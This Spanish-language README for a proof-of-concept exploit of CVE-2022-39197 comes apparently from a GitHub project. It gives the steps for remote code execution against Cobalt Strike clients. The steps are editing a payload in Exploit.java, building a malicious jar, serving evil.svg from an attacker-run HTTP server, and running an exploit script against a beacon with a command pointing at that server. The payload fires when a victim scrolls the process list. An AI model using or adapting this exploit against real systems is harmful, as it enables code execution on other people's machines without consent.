
CVE-2022-39197 RCE POC
Este proyecto fue modificado a partir del proyecto de @its-arun https://github.com/its-arun/CVE-2022-39197
Cuando probé el script, descubrí que el script de frida no podía consultar los datos en el orden normal. El método consiste en modificar el script de frida para modificar el nombre del proceso.
Gracias al Maestro @Kai5174 por su contribución al método de explotación.
1、Edite el comando ejecutado con su payload en EvilJar/src/main/java/Exploit.java, actualmente solo puede abrir la calculadora.
2、Compile usando jar mvn clean compile assembly:single
4、Mueva EvilJar-1.0-jar-with-dependencies.jar de EvilJar/target/ a la carpeta serve/
5、Edite serve\evil.svg y reemplace
[attacker]6、Sirva usando python3 -m http.server 8080
7、Genere beacon.exe con versión de C2 menor o igual a 4.7
8、Debe ejecutar el script de Python en un sistema Windows para conectarse, y realizar contramedidas cuando el cliente acceda a la lista de procesos y vea el proceso beacon.exe.
python3 -m pip install -r requirements.txt
python3 cve-2022-39197_Yyy.py beacon.exe http://192.168.10.10:8080/evil.svg
El payload se activará tan pronto como el usuario se desplace por la Lista de Procesos.
Windows

Mac

https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg — Hay un gran análisis en profundidad de esta vulnerabilidad https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html
Modificado de https://github.com/its-arun/CVE-2022-39197